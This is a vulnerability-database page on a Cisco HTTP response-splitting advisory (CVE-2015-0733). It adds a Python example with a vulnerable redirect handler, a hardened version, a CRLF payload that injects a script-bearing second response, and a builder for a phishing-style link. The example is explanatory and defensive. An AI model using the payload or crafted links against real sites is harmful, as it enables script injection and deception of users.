Vulnslist

Cisco vulnerabilities by product, model, software, and advisory.

Cisco Headend Digital Broadband Delivery System HTTP Response-Splitting Vulnerability

Cisco-SA-20150529-CVE-2015-0733 · Medium · Published · Updated

A vulnerability in the Cisco Headend Digital Broadband Delivery System could allow an unauthenticated, remote attacker to conduct HTTP response-splitting attacks.

The vulnerability is due to improper sanitization of user input by the HTTP Header Handler in the affected software while handling HTTP requests. An attacker could exploit this vulnerability by convincing a user to follow a malicious HTTP URL that contains crafted carriage return-line feed (CRLF) characters. When the affected software copies such input into a response header, the CRLF sequence terminates that header, and the rest of the attacker's input is emitted as additional headers and body. This could allow the attacker to execute arbitrary script code in the user's browser in the security context of the affected site, or to deliver crafted responses to the user, which may allow the attacker to conduct further attacks on the targeted system. Cisco has confirmed the vulnerability; however, software updates are not available.

To exploit the vulnerability, the attacker may provide a malicious link (one that points at the affected system and carries the crafted CRLF characters) and use misleading language or instructions to persuade the user to follow it.
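Response splitting of the kind the advisory describes needs only one header value that is written to the response without CR/LF filtering. The following is an added example, not Cisco's code and not the affected HTTP Header Handler: a hypothetical redirect handler in its vulnerable and hardened forms, a constructed payload, a constructed phishing-style URL carrying it, and a small response parser that shows the single reflected value producing two responses on the wire. The handler names, the host name, the `next` parameter and the payload are assumptions for illustration; the example assumes the server has already URL-decoded the parameter before the handler sees it.

```python
"""HTTP response splitting via an unfiltered header value (added example).

Hypothetical handler, not the affected Cisco software: `vulnerable_redirect`
copies a request parameter into the Location header verbatim;
`hardened_redirect` rejects control characters first.
"""
import re
from urllib.parse import quote

CRLF = "\r\n"

# Constructed payload: ends the Location header and the first response,
# then supplies a complete second response with an attacker-chosen body.
PAYLOAD = (
    "/home" + CRLF
    + "Content-Length: 0" + CRLF
    + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: 25" + CRLF
    + CRLF
    + "<script>alert(1)</script>"       # exactly 25 bytes
)


def vulnerable_redirect(next_url: str) -> bytes:
    """Hypothetical vulnerable handler: reflects `next_url` into Location
    without checking for CR/LF, so the value can terminate the header block."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + next_url + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    ).encode("latin-1")


def hardened_redirect(next_url: str) -> bytes:
    """Hardened form: refuse any CR, LF or other control character in the
    header value. Rejecting is preferable to stripping, because stripping
    silently changes the meaning of the value the caller asked for."""
    if re.search(r"[\x00-\x1f\x7f]", next_url):
        raise ValueError("control characters are not permitted in header values")
    return vulnerable_redirect(next_url)


def crafted_link(host: str = "headend.example") -> str:
    """The URL an attacker would send to a victim (constructed hostname):
    the CRLF characters travel percent-encoded as %0D%0A."""
    return f"http://{host}/redirect?next=" + quote(PAYLOAD, safe="")


def parse_responses(raw: bytes):
    """Minimal parser for a sequence of HTTP/1.x responses on one connection.
    Returns a list of (status_line, headers, body); the body length is taken
    from Content-Length. Used here to show how many responses the reflected
    value produced, which is what a browser or cache would also see."""
    responses = []
    pos = 0
    while raw.startswith(b"HTTP/", pos):
        end = raw.index(b"\r\n\r\n", pos)
        head = raw[pos:end].decode("latin-1").split("\r\n")
        status, header_lines = head[0], head[1:]
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        body = raw[body_start:body_start + length]
        responses.append((status, headers, body))
        pos = body_start + length
    return responses


def split_count(next_url: str) -> int:
    """Number of responses the vulnerable handler emits for a given value:
    1 for a benign value, more than 1 when splitting succeeded."""
    return len(parse_responses(vulnerable_redirect(next_url)))


if __name__ == "__main__":
    print("benign value ->", split_count("/home"), "response(s)")
    print("payload      ->", split_count(PAYLOAD), "response(s)")
    for status, _, body in parse_responses(vulnerable_redirect(PAYLOAD)):
        print("  ", status, body)
    try:
        hardened_redirect(PAYLOAD)
    except ValueError as exc:
        print("hardened handler rejected payload:", exc)
    print("link a victim would be sent:", crafted_link())
```

The second response in the parsed output is entirely attacker-authored, which is why the advisory lists script execution in the site's context as the outcome: the browser attributes that 200 response to the affected host. The hardened variant matches what modern HTTP libraries do themselves (Python's `http.client`, for instance, raises on CR/LF in header values), so the same check belongs in any custom header writer.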

Cisco advisory · CSAF JSON

Workarounds

Administrators are advised to contact the vendor regarding future updates and releases.

Users are advised not to open email messages from suspicious or unrecognized sources. If users cannot verify that links or attachments included in email messages are safe, they are advised not to open them.

Administrators are advised to monitor affected systems.

CVEs: CVE-2015-0733
Cisco Bug IDs: CSCur25580
CVSS Score: Base 4.3 (CVSS v2)
CVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N (base) / E:H/RL:U/RC:C (temporal)
Product Names From Source: Cisco Headend System Releases, Headend System Releases

Related Products

Product                                       CVE             Evidence
Headend System Releases                       CVE-2015-0733   Cisco OpenVuln
Headend Digital Broadband Delivery System     CVE-2015-0733   Cisco OpenVuln
Cisco Headend System Releases                 CVE-2015-0733   Cisco OpenVuln
Cisco Headend Digital Broadband Delivery System   CVE-2015-0733   Cisco OpenVuln